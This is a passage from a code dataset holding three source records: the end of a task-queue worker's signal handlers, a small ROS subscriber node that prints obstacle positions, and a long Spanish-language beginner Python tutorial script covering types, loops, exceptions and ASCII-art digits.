error\n\n @staticmethod\n def _handle_sigusr1(signum: int, frame: Any) -> None:\n \"\"\"Print stacktrace.\"\"\"\n print('=' * 70)\n print(''.join(traceback.format_stack()))\n print('-' * 70)\n\n def _handle_sigusr2(self, signum: int, frame: Any) -> None:\n \"\"\"Drop current task.\"\"\"\n logger.warning(\"Catched SIGUSR2\")\n if self.current_task:\n logger.warning(\"Dropping current task...\")\n raise Discard\n\n def drop_task(self) -> None:\n os.kill(os.getpid(), signal.SIGUSR2)\n","repo_name":"cenkalti/kuyruk","sub_path":"kuyruk/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":15126,"program_lang":"python","lang":"en","doc_type":"code","stars":229,"dataset":"github-code","pt":"99"} +{"seq_id":"18959649897","text":"#!/usr/bin/env python\nimport rospy\nfrom random import *\nfrom std_msgs.msg import String\nfrom rogerleo_hw2.msg import id_and_point \n\n\ndef callback(data):\n #def __init__(self):\n #rospy.loginfo(str(data.id) + \" at position\")\n #rospy.loginfo( \" x = \" +str(data.points.x))\n #rospy.loginfo( \" y = \" 
+str(data.points.y))\n #rospy.loginfo( \" z = \" +str(data.points.z))\n print(str(data.id) + \" at position\")\n print( \" x = \" +str(data.points.x))\n print( \" y = \" +str(data.points.y))\n print( \" z = \" +str(data.points.z))\n\n #rospy.get_caller_id() +\ndef node_3():\n rospy.init_node('node_3', anonymous=True)\n rospy.Subscriber(\"registered_obstacles\", id_and_point, callback)\n\n rospy.spin()\n\nif __name__ == '__main__':\n node_3()\n","repo_name":"amiriqbal4/Fundamentals_of_AutonomousRobotics_2019","sub_path":"rogerleo_hw2/src/node_3.py","file_name":"node_3.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29296913708","text":"#!/usr/bin/env python3\n'''breve intoduccion a la programacion por procedimientos'''\n\n# importar modulo\n\nimport sys\n\nprint ('VERSION en uso de PYTHON\\n')\n\nprint (sys.version, '\\n')\n\nprint ('¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬\\n')\n\nvalor = 125.66 # asigna numero con decimales -float-\n\nprint (int (valor), '\\n') # presenta el valor como numero entero sin decimales con int\n\ncadena = 'esto es una cadena\\n' # asigna una cadena con salto de linea\n\nprint (cadena) # presenta la cadena\n\nprint ('elemento de una cadena ; cadena [0] ',cadena [0], '\\n') # presenta el elemento de la posicion indicada de la cadena\n\nprint ('subcadena de la cadena ; cadena [0 : 4] ',cadena [0 : 4], '\\n') # presenta el tramo entre las posiciones 0 a 4 -4 NO incluido-\n\nprint ('convertir un valor en una cadena ; str (valor) ', str (valor), '\\n') # presenta el valor convertido en una cadena\n\nvalorCadena = '125' # asigna cadena -entero-\n\nprint ('convertir la cadena en un valor con decimales ; float (valorCadena) ',float (valorCadena), '\\n') # presenta la cadena convertida a un valor con decimales con float\n\nprint ('presentar contenidos variables ; valor,cadena,valorCadena ',valor,cadena,valorCadena, '\\n') # presenta el contenido de las variables\n\nprint ('tipo variable ; type (valor) ',type (valor), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo variable ; type (cadena) ',type (cadena), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo variable ; type (valorCadena) ',type (valorCadena), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo valor ; type (1000) ',type (1000), '\\n') # presenta el tipo de valor con type\n\nprint ('tipo valor ; type (.10) ',type (.10), '\\n') # presenta el tipo de valor con type\n\nprint ('tipo valor ; type (\"1000\") ',type (\"1000\"), '\\n') # presenta el tipo de valor con type\n\ntupla = ('cadena',100, .9, '200') # tupla -valores inmutables , NO se pueden cambiar-\n\nlista = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar-\n\nprint ('tipo tupla , type (tupla) ', type (tupla), '\\n') # presenta el tipo de la referencia\n\nprint ('tipo tupla , type (lista) ', type (lista), '\\n') # presenta el tipo de la referencia\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (tupla)',len (tupla), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (lista)',len (lista), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (cadena)',len (cadena), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (valorCadena)',len (valorCadena), '\\n' )\n\nprint ('len () devuelve el numero 
de elementos de una secuencia ; len (\"numero de elementos de esta cadena\")',len (\"numero de elementos de esta cadena\"), '\\n' )\n\nprint ('añadir elementos a una lista ; lista.append (\"penultimo elemento\")\\n')\n\nlista.append (\"penultimo elemento\") # añade la cadena al final dde la lista\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('añadir elementos a la lista mediante tipos ; list.append (lista,\"ultimo elemento\")\\n')\n\nlist.append (lista,\"ultimo elemento\") # añade el elemento a la lista usando el tipo de dato\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('insertar un elemento en la posicion indicada de lista ; lista.insert (1,\"uno\")\\n')\n\nlista.insert (1,\"uno\") # inserta en la posicion indicada la cadena indicada\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('presentar el elemento de la posicion 1 de lista ; lista [1] ',lista [1], '\\n') # presenta el valor de la posicion indicada \n\nprint ('eliminar un elemento de la lista con remove ; lista.remove (\"cadena\")\\n')\n\nlista.remove (\"cadena\") # elimina el elemento indicado de la lista\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('presentar el elemento de un posicion indicada en una tupla ; tupla [1] ',tupla [1], '\\n') # presenta el elemento de la tupla indicado en la posicion\n\nprint ('cambiar el elemento de una posicion de la lista ; lista [1] = \"CIEN\"\\n')\n\nlista [1] = \"CIEN\" # cambia el elemento de la posicion indicada por el indicado\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nLista = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar- \n\nLISTA = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar- \n\nprint ('contenido de Lista ', Lista, '\\n') # presenta el contenido de la lista\n\nprint ('contenido de LISTA ', LISTA, '\\n') # presenta el contenido de la lista\n\nprint ('comparar si dos objetos son el mismo ; Lista is LISTA ',Lista is LISTA, '\\n') # presenta False al no ser la misma lista\n\nprint ('asignar el mismo objeto a LISTA ; LISTA = Lista\\n')\n\nLISTA = Lista # asigna el bjeto indicado\n\nprint ('comparar si dos objetos son el mismo ; Lista is LISTA ',Lista is LISTA, '\\n') # presenta True al ser la misma lista\n\ncualquiera = 'cualquiera' # asigna cadena\n\nnulo = None # asigna valor nulo\n\nprint ('contenido de cualquiera ', cualquiera, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de nulo ', nulo, '\\n') # presenta el contenido de la variable\n\nprint ('comprobar si el contenido es del objeto -variable- ; cualquiera is \"cualquiera\" ',cualquiera is \"cualquiera\", '\\n' ) # presenta True al ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; nulo is None ',nulo is None, '\\n' ) # presenta True al ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; cualquiera is not None ',cualquiera is not None, '\\n' ) # presenta True al NO ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; nulo is not None ',nulo is not None, '\\n' ) # presenta False al ser el contenido\n\nCUALQUIERA = \"cualquiera\" # asigna cadena\n\nprint ('contenido de CUALQUIERA ', CUALQUIERA, '\\n') # presenta el contenido de la variable\n\nprint ('comparar si los dos objetos son los mismo ; cualquiera is CUALQUIERA ',cualquiera is CUALQUIERA, '\\n' ) # 
presenta True al ser el mismo objeto \n\ncero = 0 # asigna valor entero\n\nuno = 1 # asigna valor entero\n\nseis = 6 # asigna valor entero\n\nprint ('contenido de cero ', cero, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de uno ', uno, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de seis ', seis, '\\n') # presenta el contenido de la variable\n\nprint ('cero mayor que uno ; cero > uno ',cero > uno, '\\n' ) # presenta False al NO serlo \n\nprint ('seis menor que uno ; seis < uno ',seis < uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis menor o igual que uno ; seis <= uno ',seis <= uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis mayor o igual que uno ; seis >= uno ',seis >= uno, '\\n' ) # presenta True al ser mayor\n\nprint ('seis igual que uno ; seis == uno ',seis == uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis igual seis ; seis == seis ',seis == seis, '\\n' ) # presenta True al ser iguales\n\nprint ('comprobar si un elemento pertenece a una secuencia -lista- ; 100 in LISTA ',100 in LISTA, '\\n' ) # presenta True al pertenecer a la lista\n\nprint ('comprobar si un elemento pertenece a una secuencia -lista- ; 1 in LISTA ',1 in LISTA, '\\n' ) # presenta False al NO pertenecer a la lista\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"a\" in cualquiera ',\"a\" in cualquiera, '\\n' ) # presenta True al pertenecer a la cadena\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"1\" in cualquiera ',\"1\" in cualquiera, '\\n' ) # presenta False al NO pertenecer a la cadena\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -cadena- ; \"a\" not in cualquiera ',\"a\" not in cualquiera, '\\n' ) # presenta False al pertenecer a la cadena\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"1\" not in cualquiera ',\"1\" not in cualquiera, '\\n' ) # presenta True al NO pertenecer a la cadena\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -lista- ; 100 not in LISTA ',100 not in LISTA, '\\n' ) # presenta False al pertenecer a la lista\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -lista- ; 1 not in LISTA ',1 not in LISTA, '\\n' ) # presenta True al NO pertenecer a la lista\n\nprint ('comparacion logica -uso de and- ; cero and uno ',cero and uno, '\\n' ) # presenta el valor menor ; 0 -si los dos valores son True-\n\nprint ('comparacion logica -uso de and- ; seis and uno ',seis and uno, '\\n' ) # presenta el valor menor ; 1 -si los dos valores son True-\n\nprint ('comparacion logica -uso de and- ; seis and seis ',seis and seis, '\\n' ) # presenta el valor menor ; 6 -si los dos valores son True-\n\nprint ('comparacion logica -uso de or- ; cero or uno ',cero or uno, '\\n' ) # presenta el valor mayor ; 0 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de or- ; seis or uno ',seis or uno, '\\n' ) # presenta el valor mayor ; 1 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de or- ; seis or seis ',seis or seis, '\\n' ) # presenta el valor mayor ; 6 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de not- ; not cero ', not cero , '\\n' ) # presenta True ; not (negacion) -False tiene valor cero y True tiene valor 1-\n\nprint ('comparacion logica -uso de not- ; not (seis and uno) ',not (seis and uno), '\\n' ) # presenta False ; not (negacion) -si los dos valores son True-\n\nprint ('comparacion logica -uso de not- ; not (seis or uno) ',not (seis or uno), '\\n' ) # 
presenta False ; not (negacion) -si uno de los valores es True-\n\ntuplaVacia = () # asigna tupla vacia\n\nlistaVacia = [] # asigna lista vacia\n\ncadenaVacia = \"\" # asigna cadena vacia\n\nfalso = 0 # asigna valor int\n\nverdadero = 1 # asigna valor int \n\nprint ('contenido de tuplaVacia ', tuplaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de listaVacia ', listaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de cadenaVacia ', cadenaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de falso ', falso, '\\n') # presenta el contenido\n\nprint ('contenido de verdadero ', verdadero, '\\n') # presenta el contenido\n\nprint ('uso de if -condicion- :\\n')\n\nif tuplaVacia : # condicion , verdadero -True-\n print ('NO es una tupla vacia ', tuplaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA TUPLA VACIA ', tuplaVacia, '\\n') # presenta el texto y su valor\n\nif listaVacia : # condicion , verdadero -True-\n print ('NO es una lista vacia ', listaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA LISTA VACIA ', listaVacia, '\\n') # presenta el texto y su valor\n\nif cadenaVacia : # condicion , verdadero -True-\n print ('NO es una cadena vacia ', cadenaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA CADENA VACIA ', cadenaVacia, '\\n') # presenta el texto y su valor\n\nif falso : # condicion , verdadero -True-\n print ('NO es False ', falso, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES False ', falso, '\\n') # presenta el texto y su valor\n\nif verdadero : # condicion , verdadero -True-\n print ('ES True ', verdadero, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('NO ES True ', verdadero, '\\n') # presenta el texto y su valor\n\nif tupla : # condicion , verdadero -True-\n print ('NO es una tupla vacia ', tupla, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA TUPLA VACIA ', tupla, '\\n') # presenta el texto y su valor\n\nif lista : # condicion , verdadero -True-\n print ('NO es una lista vacia ', lista, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA LISTA VACIA ', lista, '\\n') # presenta el texto y su valor\n\nif cadena : # condicion , verdadero -True-\n print ('NO es una cadena vacia ', cadena, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA CADENA VACIA ', cadena, '\\n') # presenta el texto y su valor\n\nif seis == 0 : # condicion , verdadero -True- \n print ('-version if- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor\nelif seis == 6 : # 2ª condicion , verdadero -True-\n print ('-version elif- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor\nelse : # si no se cumplen una de las dos condiciones -if,elif- \n print ('-version else- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor \n\nprint ('bucle mientras se cumpla una condicion ; while\\n')\n\nindice = 0 # asigna valor int -uso en while-\n\nwhile True : # bucle while continuo \n print ('ELEMENTO de lista ',lista [indice], '\\n') # presenta el texto y su valor -elemento de la lista-\n indice += 1 # suma uno al valor actual\n if indice == len (lista) : # condicion , si el valor de indice es mayor al numero de elementos de lista\n print ('-- FIN DE LA LISTA --\\n') # presenta el texto\n break # interrumpe el bucle \n\nposicion = 0 # asigna valor int -uso en while-\n\nwhile posicion <= len (lista) - 1 : 
# bucle while , condicion ; mientras el valor de posicion sea menor o igual al numero de elementos de la lista restandole uno \n print ('ELEMENTO de lista ',lista [posicion], '\\n') # presenta el texto y su valor -elemento de la lista-\n posicion += 1 # suma uno al valor actual\nelse : # cuando finalice el bucle \n print ('-- FIN DE LA LISTA --\\n') # presenta el texto\n\nprint ('iterar una secuencia mediante for in \\n')\n\nfor Elemento in LISTA : # iterador , bucle for in , pasa los elementos de la lista a la variable ; Elemento\n print ('elemento de LISTA > ', Elemento, '\\n')\nelse : # cuando finalice el iterador\n print ('-- FIN DE LA LISTA --\\n')\n\nfor caracter in cadena : # iterador , bucle for in , pasa los caracteres de la cadena a la variable ; caracter\n if caracter == ' ' or caracter == '\\n': # condicion , si es un espacio en blanco o un salto de linea\n continue # vuelve al siguiente elemento de la secuencia\n if caracter in ['a', 'A', 'e', 'E', 'i', 'I', 'o', 'O', 'u', 'U'] : # condicion , si el valor esta en la lista \n print ('el caracter es una VOCAL > ', caracter, '\\n') # presenta el texto y su valor -vocal-\n else : # si no esta en la lista \n print ('el caracter es una CONSONANTE > ', caracter, '\\n') # presenta el texto y su valor -consonante- \nelse : # cuando finalice el iterador\n print ('-- FIN DE LA SECUENCIA DE LA CADENA --\\n') # presenta el texto\n\nprint ('control de excepciones -errores- con try / except\\n')\n\ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept ZeroDivisionError : # tipo de excepcion\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n \ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept ZeroDivisionError as Salida : # tipo de excepcion , pasa la salida de la excepcion a Salida\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n print (Salida, '\\n') # presenta la salida de la excepcion indicada\n\ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept : # tipo de excepcion general\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n \nprint ('operadores aritmeticos basicos ; + suma , - resta , * multiplicacion , / division\\n')\n\nprint ('suma\\n') # presenta el texto\n\nprint ('uno + seis ',uno + seis, '\\n' ) # presenta el texto y su valor -suma los valores-\n\nprint ('seis += 1\\n')\n\nseis += 1 # asignacion aumentada -suma 1 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -7 , el valor de la variable mas el asignado mediante las suma-\n\nprint ('lista += \"suma\" ', '\\n' )\n\nlista += \"suma\" # añade los caracteres de la cadena a la lista\n\nprint ('lista ', lista, '\\n') # presenta el texto y su valor -la lista con los caracteres añadidos de la cadena\n\nprint ('lista + [\"suma\"] ',lista + [\"suma\"], '\\n' ) # presenta el texto y su valor -une las dos listas en una-\n\nprint ('cadena [ : -1] + cualquiera ',cadena [ : -1] + cualquiera, '\\n' ) # presenta el texto y su valor -une las dos cadenas en una-\n\nprint ('resta\\n') # presenta el texto\n\nprint ('seis - uno ',seis - uno, '\\n' ) # presenta el texto y su valor -resta los valores-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor\n\nprint ('seis -= 1\\n')\n\nseis -= 1 # asignacion aumentada -resta 1 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -5 , el valor de la 
variable mas el asignado mediante las resta-\n\nprint ('multiplicacion\\n') # presenta el texto\n\nprint ('seis * seis ',seis * seis, '\\n' ) # presenta el texto y su valor -multiplica los valores-\n\nprint ('seis *= 2\\n')\n\nseis *= 2 # asignacion aumentada -multiplica 2 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -12 , el valor de la variable mas el asignado mediante la multiplicacion-\n\nprint ('lista *= 3 ', '\\n' )\n\nlista *= 3 # repite la lista tres veces\n\nprint ('lista ', lista, '\\n') # presenta el texto y su valor -la lista repetida tres veces-\n\nprint ('division\\n') # presenta el texto\n\nprint ('uno / seis ',uno / seis, '\\n' ) # presenta el texto y su valor -divide los valores-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor\n\nprint ('seis /= 2\\n')\n\nseis /= 2 # asignacion aumentada -divide por 2 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -3 , el valor de la variable mas el asignado mediante las division-\n\nprint ('teclee un numero entero seguido de enter o enter para salir\\n') # presenta el texto\n\ntotal = 0 # asigna valor int\n\ncontador = 0 # asigna valor int\n\nwhile True : # bucle while continuo\n entradaTeclado = input ('ENTERO :') # espera entrada teclado \n if entradaTeclado : # no es una cadena vacia\n try : # control de excepciones\n numero = int (entradaTeclado) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n total += numero # suma el valor de numero al valor actual de total\n contador += 1 # suma uno al valor actual\n else : # es una cadena vacia\n break # interrumpe el bucle while\n \nif contador : # condicion , si es True -NO cero-\n print ('contador =', contador, 'total =', total, 'media =', total / contador, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n \nprint ('entrada numeros enteros desde otro fichero , ejemplo ; capitulo1 < ficheo datos\\n') # presenta el texto\n\nTotal = 0 # asigna valor int\n\nContador = 0 # asigna valor int\n'''\nwhile True : # bucle while continuo\n EntradaTeclado = input () # espera entrada datos desde fichero externo \n if EntradaTeclado : # no es una cadena vacia\n try : # control de excepciones\n Numero = int (EntradaTeclado) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n except EOFError : # tipo de excepcion , error fin de archivo -no contiene mas datos-\n break # interrumpe el bucle while\n Total += Numero # suma el valor de Numero al valor actual de Total\n Contador += 1 # suma uno al valor actual\n'''\nif Contador : # condicion , si es True -NO cero-\n print ('contador =', Contador, 'total =', Total, 'media =', Total / Contador, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n\nprint ('entrada numeros enteros desde otro fichero -version bloques try / except anidados- , ejemplo ; capitulo1 < ficheo datos\\n') # presenta el texto\n\nTotal1 = 0 # asigna valor int\n\nContador1 
= 0 # asigna valor int\n'''\nwhile True : # bucle while continuo\n try : # control de excepciones \n EntradaTeclado1 = input () # espera entrada datos desde fichero externo \n if EntradaTeclado1 : # no es una cadena vacia\n try : # control de excepciones anidado \n Numero1 = int (EntradaTeclado1) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n Total1 += Numero1 # suma el valor de Numero1 al valor actual de Total1\n Contador1 += 1 # suma uno al valor actual \n except EOFError : # tipo de excepcion , error fin de archivo -no contiene mas datos-\n break # interrumpe el bucle while\n''' \nif Contador1 : # condicion , si es True -NO cero-\n print ('contador =', Contador1, 'total =', Total1, 'media =', Total1 / Contador1, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n\nprint ('crear una funcion con def\\n')\n\ndef cogerEntero (mensaje) : # definicion de la funcion\n while True : # bucle while continuo\n try : # control de excepciones\n entrada = int (input(mensaje)) # asigna el argumento del parametro a input -mensaje entrada teclado- , int cambia el formato de cadena a digito de la entrada de teclado\n return entrada # devuelve mensaje presentado por la entrada de teclado\n except ValueError as Error : # tipo de excepcion , pasa la salida a Error\n print ('tiene que ser un numero entero\\n') # presenta el texto\n print (Error, '\\n') # presenta la salida de la excepcion indicada\n break # interrumpe el bucle\n \ncogerEntero ('ponga un numero ') # llama y ejecuta la funcion con el argumento indicado\n\nprint ('importar modulos mediante import\\n')\n\nprint ('nombre del programa ejecutado ', sys.argv, '\\n') # presenta el nombre del fichero llamado a ejecutar\n\n# importar modulo\n\nimport random # importa el modulo indicado\n\nfor x in range (5) : # iterador , bucle for in , pasa los elementos de la lista a ; x\n print (random.randint(1, 6), '\\n') # presenta un numero entero aleatorio en el rango indicado\nelse : # cuando finalice el iterador\n print ('-- FIN random --\\n') # presenta el texto\n\nfor X in range (5) : # iterador , bucle for in , pasa los elementos de la lista a ; X\n print (random.choice(['manzana', 'banana', 'platano', 'pera', 'queso', 'tomate']), '\\n') # presenta una cadena aleatoria de las indicadas en la lista\nelse : # cuando finalice el iterador\n print ('-- FIN random --\\n') # presenta el texto\n\nCERO = [' *** ', \n ' * * ', \n '* *', \n '* *', \n '* *',\n ' * * ',\n ' *** '] # lista -numero cero 0-\n\nUNO = [' * ', \n ' ** ', \n ' * ', \n ' * ', \n ' * ',\n ' * ',\n ' *** '] # lista -numero uno 1-\n \nDOS = [' *** ', \n ' **', \n ' **', \n ' ** ', \n '* ',\n '** ',\n ' **** '] # lista -numero dos 2-\n \nTRES = [' *** ', \n ' **', \n ' *', \n ' ****', \n ' *',\n ' **',\n ' *** '] # lista -numero tres 3-\n\nCUATRO = ['** *', \n '** *', \n '** *', \n '*******', \n ' **',\n ' **',\n ' **'] # lista -numero cuatro 4-\n \nCINCO = ['****** ',\n '** ', \n '** ', \n '***** ', \n ' **',\n ' **',\n '****** '] # lista -numero cinco 5-\n\nSEIS = [' **** ',\n '** ', \n '** ', \n '***** ', \n '** **',\n '** **',\n ' *** '] # lista -numero seis 6-\n\nSIETE = ['*******', \n '*******', \n ' **', \n ' ** ', \n ' ** ',\n ' ** ',\n ' ** '] # lista -numero siete 
7-\n\nOCHO = [' *** ',\n '* *', \n ' * * ', \n ' *** ', \n ' * * ',\n '* *',\n ' *** '] # lista -numero ocho 8-\n\nNUEVE = [' ***** ', \n '* *', \n '* *', \n ' ***** ', \n ' ** ',\n ' ** ',\n ' ** '] # lista -numero nueve 9-\n\ndef numerosGrandes (numero) : # definicion de la funcion\n assert type (numero) == str, 'el argumento de numero tiene que ser un numero entero en formato cadena\\n' # regla de excepcion , si no se cumple lanza excepcion\n listaNumeros = [] # lista vacia , se asignan las listas de digitos que integran el parametro numero\n for digito in numero : # iterador , bucle for in , pasa los digitos a ; digito\n if digito == '0' : # condicion , si es igual al valor indicado\n listaNumeros.append (CERO) # añade la lista indicada a listaNumeros\n elif digito == '1' : # condicion , si es igual al valor indicado\n listaNumeros.append (UNO) # añade la lista indicada a listaNumeros\n elif digito == '2' : # condicion , si es igual al valor indicado\n listaNumeros.append (DOS) # añade la lista indicada a listaNumeros\n elif digito == '3' : # condicion , si es igual al valor indicado\n listaNumeros.append (TRES) # añade la lista indicada a listaNumeros\n elif digito == '4' : # condicion , si es igual al valor indicado\n listaNumeros.append (CUATRO) # añade la lista indicada a listaNumeros\n elif digito == '5' : # condicion , si es igual al valor indicado\n listaNumeros.append (CINCO) # añade la lista indicada a listaNumeros\n elif digito == '6' : # condicion , si es igual al valor indicado\n listaNumeros.append (SEIS) # añade la lista indicada a listaNumeros\n elif digito == '7' : # condicion , si es igual al valor indicado\n listaNumeros.append (SIETE) # añade la lista indicada a listaNumeros\n elif digito == '8' : # condicion , si es igual al valor indicado\n listaNumeros.append (OCHO) # añade la lista indicada a listaNumeros\n elif digito == '9' : # condicion , si es igual al valor indicado\n listaNumeros.append (NUEVE) # añade la lista indicada a listaNumeros\n numeroDigitos = range (len(listaNumeros)) # devuelve una lista de numeros con el numero de elementos de la lista -cero al penultimo elemento- \n for POSICION in range (7) : # iterador , bucle for in , pasa los elementos de la lista a ; POSICION -posicion de la lista-\n for columna in numeroDigitos : # iterador , bucle for in , pasa los elementos de la lista a ; columna -NUMERO-\n if columna == 0 : # condicion , asigna la lista de la posicion 0 -columna- y su indice -POSICION- de listaNumeros\n DIGITOS = listaNumeros [columna] [POSICION] + ' ' # asigna el elemento de sublista y posicion indicada \n if columna != 0 : # condicion , las siguientes columnas se añaden de listaNumeros\n DIGITOS += listaNumeros [columna] [POSICION] + ' ' # añade las siguientes sublistas y posiciones de listaNumeros\n print (DIGITOS) # presenta los elementos de las sublistas con las misma posicion en una sola linea -cadena-\n else : # cuando finalice el iterador \n print ('\\n') # salto de linea\n\nnumerosGrandes ('1015') # llama y ejecuta la funcion con el argumento indicado\n\nnumerosGrandes ('0123456789') # llama y ejecuta la funcion con el argumento indicado\n\ndef cuadriculaNumerosAleatorios (columnas, lineas, valorMaximo) : # definicion de la funcion\n assert type (columnas) == int, 'columnas debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n assert type (lineas) == int, 'lineas debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n assert type (valorMaximo) == int, 
'valorMaximo debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n numerosAleatorios = [] # lista vacia , añade los numeros aleatorios devueltos por random.randint\n lineaAleatorios = '' # cadena vacia , añade los numeros aleatorios en formato cadena\n for linea in range(lineas) : # iterador , bucle for in , pasa los elementos de la lista a ; linea -numero de lineas de numeros aleatorios a presentar-\n contador = 0 # cuenta el numero de columnas añadidas a la linea de numeros aleatorios\n while True : # bucle while continuo\n aleatorio = random.randint(1, valorMaximo) # devuelve un numero entero aleatorio dentro del rango indicado -1 al valor de valorMaximo-\n if aleatorio in numerosAleatorios : # condicion , si el numero aleatorio esta en la lista \n continue # vuelve al inicio del bucle while -genera otro numero aleatorio-\n else : # si no esta en la lista\n numerosAleatorios.append (aleatorio) # lo añade a la lista de numeros aleatorios\n if not lineaAleatorios : # condicion , si la cadena esta vacia \n lineaAleatorios = str (aleatorio) + ' ' # asigna el numero aleatorio en formato cadena mas un espacio en blanco\n else : # si la cadena no esta vacia\n lineaAleatorios += str (aleatorio) + ' ' # añade el siguiente numero aleatorio en formato cadena mas un espacio en blanco\n contador += 1 # suma uno al valor actual de contador \n if contador == columnas : # condicion , si el valor es igual al de las columnas de la linea de numeros aleatorios \n print (lineaAleatorios) # presenta una linea de numeros aleatorios -NO REPETIDOS- en formato cadena \n lineaAleatorios = '' # asigna una cadena vacia de nuevo a lineaAleatorios , para la siguiente linea\n break # interrumpe el bucle while continuo para iterar la siguiente linea de numeros aleatorios\n else : # cuando finalice el iterador\n print ('\\n-- FIN CUADRICULA NUMEROS ALEATORIOS --\\n') # presenta el texto\n\ncuadriculaNumerosAleatorios (5, 5, 100) # llama y ejecuta la funcion con el argumento indicado\n\ncuadriculaNumerosAleatorios (10, 10, 100) # llama y ejecuta la funcion con el argumento indicado\n\ndef numerosGrandes1 (numero) : # definicion de la funcion\n assert type (numero) == str, 'el argumento de numero tiene que ser un numero entero en formato cadena\\n' # regla de excepcion , si no se cumple lanza excepcion\n listaNumeros = [] # lista vacia , se asignan las listas de digitos que integran el parametro numero\n for digito in numero : # iterador , bucle for in , pasa los digitos a ; digito\n if digito == '0' : # condicion , si es igual al valor indicado\n listaNumeros.append (CERO) # añade la lista indicada a listaNumeros\n elif digito == '1' : # condicion , si es igual al valor indicado\n listaNumeros.append (UNO) # añade la lista indicada a listaNumeros\n elif digito == '2' : # condicion , si es igual al valor indicado\n listaNumeros.append 